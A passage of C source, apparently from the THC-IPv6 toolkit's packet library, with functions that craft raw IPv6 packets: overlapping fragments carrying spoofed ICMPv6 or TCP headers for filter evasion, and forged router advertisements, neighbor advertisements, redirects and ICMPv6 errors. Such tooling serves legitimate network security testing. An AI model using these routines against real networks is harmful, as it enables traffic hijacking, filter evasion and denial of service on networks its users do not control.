8, pkt + 24, 16); memcpy(pkt + 24, tmp, 16); if (pkt_len > 44) { type = pkt[6]; iptr = 40; } while (type == NXT_HDR || type == NXT_ROUTE || type == NXT_FRAG || type == NXT_OPTS || type == NXT_PIM || type == NXT_ICMP6 || type == NXT_TCP || type == NXT_UDP || type == NXT_IP4 || type == NXT_IP4_RUDIMENTARY) { switch (type) { case NXT_ICMP6: if (pkt[iptr] == ICMP6_PINGREQUEST || pkt[iptr] == ICMP6_PINGREPLY) pkt[iptr] = (pkt[iptr] == ICMP6_PINGREQUEST ? ICMP6_PINGREPLY : ICMP6_PINGREQUEST); else if (pkt[iptr] == ICMP6_NEIGHBORSOL || pkt[iptr] == ICMP6_NEIGHBORADV) pkt[iptr] = (pkt[iptr] == ICMP6_NEIGHBORSOL ? ICMP6_NEIGHBORADV : ICMP6_NEIGHBORSOL); else if (pkt[iptr] == ICMP6_ROUTERSOL || pkt[iptr] == ICMP6_ROUTERADV) pkt[iptr] = (pkt[iptr] == ICMP6_ROUTERSOL ? ICMP6_ROUTERADV : ICMP6_ROUTERSOL); else if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: ICMP6 type %d can not be inversed\n", type); pkt[iptr + 2] = 0; pkt[iptr + 3] = 0; checksum = checksum_pseudo_header(src, dst, NXT_ICMP6, &pkt[iptr], pkt_len - iptr); pkt[iptr + 2] = checksum / 256; pkt[iptr + 3] = checksum % 256; type = -1; break; case NXT_MIPV6: case NXT_PIM: case NXT_UDP: case NXT_TCP: case NXT_IP4: case NXT_IP4_RUDIMENTARY: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: inverse_packet has not implement type %d yet!\n", type); // fall through case NXT_NONXT: case NXT_DATA: case NXT_AH: case NXT_ESP: type = -1; // no processing of other headers break; case NXT_ROUTE: case NXT_FRAG: case NXT_HDR: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: inverse_packet has not implement type %d yet!\n", type); type = pkt[iptr]; iptr += (pkt[iptr + 1] + 1) * 8; if (iptr + 4 > pkt_len) { if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: packet to inverse is shorter than header tells me\n"); type = -1; } break; default: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: Unsupported header type %d!\n", type); // XXX TODO FIXME : other packet types } } if (type != -1) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: Unsupported header type %d!\n", type); if (debug) thc_dump_data(pkt, pkt_len, "Inversed Packet"); return pkt; } int thc_send_as_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len) { unsigned char *pkt = NULL, *srcmac, *dstmac; int pkt_len, mymtu = thc_get_mtu(interface); unsigned char buf[frag_len]; int count, id = time(NULL) % 2000000000, dptr = 0, last_size, run = 0; if (frag_len > mymtu - 48) frag_len = mymtu - 48; if (frag_len % 8 > 0) frag_len = (frag_len / 8) * 8; if (frag_len < 8) frag_len = 8; if ((srcmac = thc_get_own_mac(interface)) == NULL) return -1; if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { free(srcmac); return -1; } count = data_len / frag_len; if (data_len % frag_len > 0) { count++; last_size = data_len % frag_len; } else last_size = frag_len; if (debug) printf("DEBUG: data to fragment has size of %d bytes, sending %d packets with size %d, last packet has %d bytes\n", data_len, count, frag_len, last_size); while (count) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, dptr / 8, count == 1 ? 0 : 1, id)) { free(srcmac); free(dstmac); return -1; } if (count > 1) memcpy(buf, data + run * frag_len, frag_len); else memcpy(buf, data + run * frag_len, last_size); dptr += frag_len; run++; if (thc_add_data6(pkt, &pkt_len, type, buf, count == 1 ? last_size : frag_len)) { free(srcmac); free(dstmac); return -1; } thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); count--; } free(srcmac); free(dstmac); return 0; } // overlap_spoof_types: // -1 = icmpv6 toobig // 0 = icmpv6 echo request // 1-65535 = tcp (dst port) // int thc_send_as_overlapping_last_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type) { unsigned char *pkt = NULL, *srcmac, *dstmac; int pkt_len, mymtu = thc_get_mtu(interface); unsigned char buf[frag_len], *adata; int count, id = time(NULL) % 2000000000, dptr = 0, last_size, run = 0; if (overlap_spoof_type < -1 || overlap_spoof_type > 65535) { fprintf(stderr, "Error: invalid overlap_spoof_type: %d\n", overlap_spoof_type); return -1; } if (frag_len > mymtu - 56) // we need extra bytes for hdr, frag + overlap frag_len = mymtu - 56; if (frag_len % 8 > 0) frag_len = (frag_len / 8) * 8; if (frag_len < 8) frag_len = 24; if ((srcmac = thc_get_own_mac(interface)) == NULL) return -1; if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { free(srcmac); return -1; } if ((adata = malloc(data_len + frag_len + 8)) == NULL) { fprintf(stderr, "Error: unable to allocate %d bytes of memory\n", data_len + frag_len - 8); free(srcmac); free(dstmac); return -1; } memset(adata, 0, frag_len + 8); memcpy(adata + frag_len + 8, data, data_len); data_len += frag_len + 8; // only offset + length for pk2 #2 must be changed adata[0] = NXT_DST; adata[1] = ((frag_len - 16) / 8) - 1; if (overlap_spoof_type < 1) { adata[frag_len - 16] = NXT_ICMP6; adata[frag_len - 6] = getpid() % 256; // fake chksum for icmp adata[frag_len - 5] = getpid() / 256; if (overlap_spoof_type == 0) { adata[frag_len - 8] = ICMP6_PING; adata[frag_len - 1] = 1; // seq 1 } else { adata[frag_len - 8] = ICMP6_TOOBIG; adata[frag_len - 2] = 5; // mtu 1280 } } else { adata[frag_len - 16] = NXT_TCP; adata[frag_len - 8] = 44; // scrport adata[frag_len - 7] = 44; adata[frag_len - 6] = overlap_spoof_type / 256; // dstport adata[frag_len - 5] = overlap_spoof_type % 256; adata[frag_len - 4] = 1; adata[frag_len - 3] = getpid() % 256; // fake seq num adata[frag_len - 2] = getpid() % 256; // fake seq num adata[frag_len - 1] = 2; } adata[frag_len] = type; count = data_len / frag_len; if (data_len % frag_len > 0) { count++; last_size = data_len % frag_len; } else last_size = frag_len; if (debug) printf("DEBUG: data to fragment has size of %d bytes (incl. spoof data), sending %d packets with size %d, last packet has %d bytes\n", data_len, count, frag_len, last_size); while (count) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, dptr / 8, count == 1 ? 0 : 1, id)) { free(srcmac); free(dstmac); return -1; } if (count > 1) memcpy(buf, adata + run * frag_len, frag_len); else memcpy(buf, adata + run * frag_len, last_size); if (thc_add_data6(pkt, &pkt_len, NXT_DST, buf, count == 1 ? last_size : frag_len)) { free(srcmac); free(dstmac); return -1; } dptr += frag_len; if (run == 0) dptr -= 16; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); run++; count--; } free(adata); free(srcmac); free(dstmac); return 0; } // overlap_spoof_types: // -1 = icmpv6 toobig // 0 = icmpv6 echo request // 1-65535 = tcp (dst port) // int thc_send_as_overlapping_first_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type) { unsigned char *pkt = NULL, *srcmac, *dstmac; int pkt_len, mymtu = thc_get_mtu(interface); unsigned char buf[frag_len], *adata; int count, id = time(NULL) % 2000000000, dptr = 0, last_size, run = 0; if (overlap_spoof_type < -1 || overlap_spoof_type > 65535) { fprintf(stderr, "Error: invalid overlap_spoof_type: %d\n", overlap_spoof_type); return -1; } if (frag_len > mymtu - 56) // we need extra bytes for hdr, frag + overlap frag_len = mymtu - 56; if (frag_len % 8 > 0) frag_len = (frag_len / 8) * 8; if (frag_len < 8) frag_len = 24; if ((srcmac = thc_get_own_mac(interface)) == NULL) return -1; if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { free(srcmac); return -1; } if ((adata = malloc(data_len + frag_len + 8)) == NULL) { fprintf(stderr, "Error: unable to allocate %d bytes of memory\n", data_len + frag_len - 8); free(srcmac); free(dstmac); return -1; } memset(adata, 0, frag_len + 8); memcpy(adata + frag_len + 8, data, data_len); data_len += frag_len + 8; // only offset + length for pk2 #2 must be changed adata[0] = NXT_DST; adata[1] = ((frag_len - 16) / 8) - 1; if (overlap_spoof_type < 1) { adata[frag_len - 16] = NXT_ICMP6; adata[frag_len - 6] = getpid() % 256; // fake chksum for icmp adata[frag_len - 5] = getpid() / 256; if (overlap_spoof_type == 0) { adata[frag_len - 8] = ICMP6_PING; adata[frag_len - 1] = 1; // seq 1 } else { adata[frag_len - 8] = ICMP6_TOOBIG; adata[frag_len - 2] = 5; // mtu 1280 } } else { adata[frag_len - 16] = NXT_TCP; adata[frag_len - 8] = 44; // scrport adata[frag_len - 7] = 44; adata[frag_len - 6] = overlap_spoof_type / 256; // dstport adata[frag_len - 5] = overlap_spoof_type % 256; adata[frag_len - 4] = 1; adata[frag_len - 3] = getpid() % 256; // fake seq num adata[frag_len - 2] = getpid() % 256; // fake seq num adata[frag_len - 1] = 2; } adata[frag_len] = type; count = data_len / frag_len; if (data_len % frag_len > 0) { count++; last_size = data_len % frag_len; } else last_size = frag_len; if (debug) printf("DEBUG: data to fragment has size of %d bytes (incl. spoof data), sending %d packets with size %d, last packet has %d bytes\n", data_len, count, frag_len, last_size); while (count) { if (run > 0) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, dptr / 8, count == 1 ? 0 : 1, id)) { free(srcmac); free(dstmac); return -1; } if (count > 1) memcpy(buf, adata + run * frag_len, frag_len); else memcpy(buf, adata + run * frag_len, last_size); if (thc_add_data6(pkt, &pkt_len, NXT_DST, buf, count == 1 ? last_size : frag_len)) { free(srcmac); free(dstmac); return -1; } thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); } dptr += frag_len; if (run == 0) dptr -= 16; run++; count--; } // now we send the first pkt if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, id)) { free(srcmac); free(dstmac); return -1; } memcpy(buf, adata, frag_len); if (thc_add_data6(pkt, &pkt_len, NXT_DST, buf, frag_len)) { free(srcmac); free(dstmac); return -1; } thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); free(adata); free(srcmac); free(dstmac); return 0; } int thc_ping6(char *interface, unsigned char *src, unsigned char *dst, int size, int count) { //, char **packet, int *packet_len) { unsigned char *pkt = NULL; int pkt_len; unsigned char buf[size]; int ret, counter = count; memset(buf, 'A', size); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, size, 0) < 0) return -1; if (count < 0) counter = 1; else counter = count; while (counter > 0) { ret += thc_generate_and_send_pkt(interface, NULL, NULL, pkt, &pkt_len); counter--; } pkt = thc_destroy_packet(pkt); return ret; } int thc_ping26(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *src, unsigned char *dst, int size, int count) { //, char **packet, int *packet_len) { unsigned char *pkt = NULL; int pkt_len; unsigned char buf[size]; int ret, counter = count; memset(buf, 'A', size); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, size, 0) < 0) return -1; if (count < 0) counter = 1; else counter = count; while (counter > 0) { ret += thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); counter--; } pkt = thc_destroy_packet(pkt); return ret; } int thc_neighboradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char *dstmac, unsigned int flags, unsigned char *target) { unsigned char *pkt = NULL, *mysrc, *mydst, *mysrcmac; int pkt_len; unsigned char buf[24]; int ret; if (src == NULL) mysrc = thc_get_own_ipv6(interface, dst, PREFER_LINK); else mysrc = src; if (target == NULL) target = mysrc; if (dst == NULL) mydst = thc_resolve6("ff02:0:0:0:0:0:0:1"); else mydst = dst; if (srcmac == NULL) mysrcmac = thc_get_own_mac(interface); else mysrcmac = srcmac; memcpy(buf, target, 16); if (mysrcmac != NULL) { buf[16] = 2; buf[17] = 1; memcpy(&buf[18], mysrcmac, 6); } if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, mysrc, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mysrcmac); return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, (unsigned char *) &buf, sizeof(buf), 0) < 0) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mysrcmac); return -1; } ret = thc_generate_and_send_pkt(interface, mysrcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mysrcmac); return ret; } int thc_routersol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char *dstmac) { unsigned char *pkt = NULL, *mydst; int pkt_len; int ret; // unsigned char buf[8]; if (dst == NULL) mydst = thc_resolve6("ff02:0:0:0:0:0:0:2"); else mydst = dst; // memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, NULL, 0 /*(unsigned char*)&buf, sizeof(buf) */ , 0) < 0) { if (dst == NULL) free(mydst); return -1; } ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); if (dst == NULL) free(mydst); return ret; } int thc_neighborsol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *target, unsigned char *srcmac, unsigned char *dstmac) { unsigned char *pkt = NULL, *mysrc, *mymac = NULL, *mydst; int pkt_len; unsigned char buf[24]; int ret; if (target == NULL && dst == NULL) return -1; if (src == NULL) { if (dst != NULL) mysrc = thc_get_own_ipv6(interface, dst, PREFER_LINK); else if (target != NULL) mysrc = thc_get_own_ipv6(interface, target, PREFER_LINK); else mysrc = thc_get_own_ipv6(interface, NULL, PREFER_LINK); } else mysrc = src; if (srcmac == NULL) mymac = thc_get_own_mac(interface); else mymac = srcmac; if (dst == NULL) { //mydst = thc_resolve6("ff02::1"); // we could do a limited multicast here but we dont mydst = thc_resolve6("ff02::1:ff00:0"); memcpy(mydst + 13, target + 13, 3); } else mydst = dst; if (target == NULL) target = mydst; memcpy(buf, target, 16); if (mymac != NULL) { buf[16] = 1; buf[17] = 1; memcpy(&buf[18], mymac, 6); } // XXX TODO FIXME: check if dst ip6 in ip6 header is target ip or multicast if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, mysrc, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 24, 0) < 0) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } ret = thc_generate_and_send_pkt(interface, mymac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return ret; } int thc_routeradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char default_ttl, int managed, unsigned char *prefix, int prefixlen, int mtu, unsigned int lifetime) { unsigned char *pkt = NULL, *mysrc, *mydst, *mymac; int pkt_len, ret = 0; unsigned char buf[56]; unsigned int flags; if (prefix == NULL) return -1; if (src == NULL) mysrc = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else mysrc = src; if (srcmac == NULL) mymac = thc_get_own_mac(interface); else mymac = srcmac; if (dst == NULL) mydst = thc_resolve6("ff02:0:0:0:0:0:0:1"); else mydst = dst; flags = default_ttl << 24; if (managed) flags += (128 + 64 + 32 + 8) << 16; flags += (lifetime > 65535 ? 65535 : lifetime); memset(buf, 0, sizeof(buf)); buf[1] = 250; // this defaults reachability checks to approx 1 minute buf[5] = 30; // this defaults neighbor solitication messages to aprox 15 seconds // options start at byte 12 // mtu buf[8] = 5; buf[9] = 1; if (mtu) { buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; } // prefix info buf[16] = 3; buf[17] = 4; buf[18] = prefixlen; if (managed) buf[19] = 128 + 64 + 32 + 16; if (lifetime) { buf[20] = lifetime / 16777216; buf[21] = (lifetime % 16777216) / 65536; buf[22] = (lifetime % 65536) / 256; buf[23] = lifetime % 256; memcpy(&buf[24], &buf[20], 4); } // 4 bytes reserved memcpy(&buf[32], prefix, 16); // source link buf[48] = 1; buf[49] = 1; if (mymac != NULL) memcpy(&buf[50], mymac, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, mysrc, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, flags, (unsigned char *) &buf, sizeof(buf), 0) < 0) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } ret = thc_generate_and_send_pkt(interface, mymac, NULL, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return ret; } int thc_toobig6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned int mtu, unsigned char *orig_pkt, int orig_pkt_len) { unsigned char *pkt = NULL, *dst; int pkt_len; unsigned char buf[1500]; int buflen = orig_pkt_len, ret; // if (orig_pkt_len > 0) // buflen = orig_pkt_len > mtu - 48 ? mtu - 48 : orig_pkt_len; if (buflen < 1) return -1; if (buflen > thc_get_mtu(interface) - 48) buflen = thc_get_mtu(interface) - 48 - do_hdr_size; memcpy(buf, orig_pkt, buflen); dst = orig_pkt + 8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_TOOBIG, 0, mtu, (unsigned char *) &buf, buflen, 0) < 0) return -1; ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); return ret; } int thc_paramprob6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned int pointer, unsigned char *orig_pkt, int orig_pkt_len) { unsigned char *pkt = NULL, *dst; int pkt_len, ret; unsigned char buf[1022]; if (orig_pkt_len > 0) memcpy(buf, orig_pkt, orig_pkt_len > 1022 ? 1022 : orig_pkt_len); dst = orig_pkt + 8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PARAMPROB, code, pointer, (unsigned char *) &buf, orig_pkt_len > 1022 ? 1022 : orig_pkt_len, 0) < 0) return -1; ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); return ret; } int thc_unreach6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned char *orig_pkt, int orig_pkt_len) { unsigned char *pkt = NULL, *dst; int pkt_len, ret; unsigned char buf[1022]; if (orig_pkt_len > 0) memcpy(buf, orig_pkt, orig_pkt_len > 1022 ? 1022 : orig_pkt_len); dst = orig_pkt + 8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_UNREACH, code, 0, (unsigned char *) &buf, orig_pkt_len > 1022 ? 1022 : orig_pkt_len, 0) < 0) return -1; ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); return ret; } int thc_redir6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char *newrouter, unsigned char *newroutermac, unsigned char *orig_pkt, int orig_pkt_len) { unsigned char *pkt = NULL, dst[16], osrc[16]; int pkt_len, ret; unsigned char buf[1070]; memset(buf, 0, sizeof(buf)); memcpy(dst, orig_pkt + 8, 16); memcpy(osrc, orig_pkt + 24, 16); memcpy(buf, newrouter, 16); memcpy(&buf[16], osrc, 16); buf[32] = 2; buf[33] = 1; memcpy(&buf[34], newroutermac, 6); buf[40] = 4; buf[41] = orig_pkt_len > 1022 ? 128 : (orig_pkt_len + 8) / 8; if ((orig_pkt_len + 8) % 8 > 0) buf[41] += 1; if (orig_pkt_len > 0) memcpy(buf + 48, orig_pkt, orig_pkt_len > 1022 ? 1022 : orig_pkt_len); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_REDIR, 0, 0, (unsigned char *) &buf, orig_pkt_len > 1022 ? 1042 : orig_pkt_len + 48, 0) < 0) return -1; ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); return ret; } unsigned char *thc_create_ipv6_extended(char *interface, int prefer, int *pkt_len, unsigned char *src, unsigned char *dst, int ttl, int length, int label, int class, int version) { thc_ipv6_hdr *hdr; unsigned char *my_src; char *pkt = NULL; *pkt_len = 40; pkt = malloc(sizeof(thc_ipv6_hdr)); hdr = (thc_ipv6_hdr *) pkt; if (pkt == NULL) return NULL; hdr->pkt = NULL; hdr->pkt_len = 0; if (src == NULL) my_src = thc_get_own_ipv6(interface, dst, prefer); else my_src = src; if (dst == NULL || my_src == NULL) { if (src == NULL) free(my_src); return NULL; } memcpy(hdr->src, my_src, 16); memcpy(hdr->dst, dst, 16); hdr->final_dst = hdr->dst; hdr->original_src = hdr->src; if (version == 0) hdr->version = 6; else if (version == -1) hdr->version = 0; else hdr->version = version; if (length == -1) hdr->length = 0; else hdr->length = length; if (class == -1) hdr->class = 0; else hdr->class = class; if (label == -1) hdr->label = 0; else hdr->label = label; if (ttl == 0) hdr->ttl = 255; else if (ttl == -1) hdr->ttl = 0; else hdr->ttl = ttl; hdr->next_segment = NULL; hdr->final = NULL; hdr->next = NXT_NONXT; hdr->final_type = NXT_NONXT; if (src == NULL) free(my_src); return pkt; } unsigned char *thc_create_ipv6(char *interface, int *pkt_len, unsigned char *src, unsigned char *dst) { return thc_create_ipv6_extended(interface, dst != NULL && *dst == 0xff ? PREFER_LINK : PREFER_GLOBAL, pkt_len, src, dst, 255, 0, 0, 0, 0); } // XXX TODO FIXME int thc_add_ipv4_extended(unsigned char *pkt, int *pkt_len, int src, int dst, unsigned char tos, int id, unsigned char ttl) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf2 = malloc(20), type = NXT_IP4; if (nehdr == NULL || hdr == NULL || buf2 == NULL) { if (buf2 != NULL) free(buf2); if (nehdr != NULL) free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = type; hdr->next_segment = (char *) nehdr; } else { ehdr->next = type; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = type; memset(buf2, 0, 20); buf2[0] = 0x45; buf2[3] = 20; // needs to be updated at final! buf2[4] = getpid() % 256; buf2[5] = getpid() / 256; buf2[8] = 0xff; buf2[9] = NXT_NONXT; // needs to be updated at final! memcpy(buf2 + 12, (char*)&src + _TAKE4, 4); memcpy(buf2 + 16, (char*)&dst + _TAKE4, 4); /* // needs to be updated at final! checksum = checksum_pseudo_header(NULL, NULL, NXT_IP4, buf2, 20); buf2[10] = checksum / 256; buf2[11] = checksum % 256; */ nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf2; nehdr->data_len = 20; nehdr->length = 20; hdr->length += 20; *pkt_len += 20; return 0; } int thc_add_ipv4(unsigned char *pkt, int *pkt_len, int src, int dst) { return thc_add_ipv4_extended(pkt, pkt_len, src, dst, 0, 0, 64); } int thc_add_ipv4_rudimentary(unsigned char *pkt, int *pkt_len, int src4, int dst4, int port) { #define THC_IPv4_RUDIMENTARY_LEN (20 + 8) thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; char *ihdr = malloc(THC_IPv4_RUDIMENTARY_LEN); // ipv4 hdr + udp-emtpy thc_ipv6_ext_hdr *ehdr; int checksum; if (ihdr == NULL) return -1; memset(ihdr, 0, THC_IPv4_RUDIMENTARY_LEN); if (hdr->final != NULL) { ehdr = (thc_ipv6_ext_hdr *) hdr->final; ehdr->next_segment = (char *) ihdr; ehdr->next = NXT_IP4_RUDIMENTARY; } else { hdr->next_segment = (char *) ihdr; hdr->next = NXT_IP4_RUDIMENTARY; } hdr->final = (char *) ihdr; hdr->final_type = NXT_IP4_RUDIMENTARY; // set ihdr buffer ihdr[0] = 0x45; ihdr[3] = THC_IPv4_RUDIMENTARY_LEN; ihdr[4] = getpid() % 256; ihdr[5] = getpid() / 256; ihdr[8] = 0xff; if (port == -1) { ihdr[9] = NXT_ICMP4; ihdr[20] = 8; // ICMPv4 Echo Request ihdr[22] = 0xf7; ihdr[23] = 0xff; } else { ihdr[9] = NXT_UDP; ihdr[20] = 5; // srcport ihdr[21] = port % 256; // srcport ihdr[22] = (port / 256) % 256; ihdr[23] = port % 256; ihdr[25] = 8; // udp pkt length // no checksum } memcpy(ihdr + 12, (char*)&src4 + _TAKE4, 4); memcpy(ihdr + 16, (char*)&dst4 + _TAKE4, 4); checksum = checksum_pseudo_header(NULL, NULL, NXT_IP4, ihdr, 20); ihdr[10] = checksum / 256; ihdr[11] = checksum % 256; hdr->length += THC_IPv4_RUDIMENTARY_LEN; *pkt_len += THC_IPv4_RUDIMENTARY_LEN; return 0; } int thc_add_hdr_misc(unsigned char *pkt, int *pkt_len, unsigned char type, int len, unsigned char *buf, int buflen) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf2 = malloc((buflen % 8 == 6 ? buflen : (((buflen + 1) / 8) * 8) + 6)); if (nehdr == NULL || hdr == NULL || buf == NULL || buf2 == NULL) { if (buf2 != NULL) free(buf2); if (nehdr != NULL) free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = type; hdr->next_segment = (char *) nehdr; } else { ehdr->next = type; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = type; memset(buf2, 0, (buflen % 8 == 6 ? buflen : (((buflen + 1) / 8) * 8) + 6)); memcpy(buf2, buf, buflen); nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf2; nehdr->data_len = (buflen % 8 == 6 ? buflen : (((buflen + 1) / 8) * 8) + 6); if (len == -1) nehdr->length = (nehdr->data_len + 1) / 8; else nehdr->length = len % 256; hdr->length += (buflen % 8 == 6 ? buflen + 2 : (((buflen + 1) / 8) * 8) + 6 + 2); *pkt_len += (buflen % 8 == 6 ? buflen + 2 : (((buflen + 1) / 8) * 8) + 6 + 2); return 0; } int thc_add_hdr_route(unsigned char *pkt, int *pkt_len, unsigned char **routers, unsigned char routerptr) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); int i = 0, j; unsigned char *buf; if (nehdr == NULL || hdr == NULL) { free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = NXT_ROUTE; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_ROUTE; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_ROUTE; while (routers[i] != NULL) i++; if (i > 23) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: IPv6 Routing Header is adding more than 23 targets, packet might be dropped by destination\n"); if (i == 0) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: IPv6 Routing Header added without routing targets\n"); if ((buf = malloc(i * 16 + 2 + 4)) == NULL) { 